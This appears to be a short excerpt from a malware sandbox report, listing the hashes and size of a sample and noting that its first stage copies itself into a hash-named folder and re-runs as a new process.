SHA512: 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9
Byte-for-byte identical to the submitted sample: the first stage copies itself into a sub-folder named after its own hash and re-executes from there as PID 1428.

(path not recorded)
Filesize: 7KB
MD5: 9ac3e119ac46c13b65583394ec98fcc7
SHA1: df6a749b58413cd1fd7c78ffe11abaf012dcf877
SHA256: e1e0738756d5498076391e3e889dfb934e4f183108a9367cb6a2e37c8e71bcf4
SHA512: d2262612be676f09bafc61331ba52ebfbbc071c0c4fbfd77bc6efd11bde70e13d06f74c9d1190a22bdb5187312e342c6f9b559b39d865414249aa3767b83c214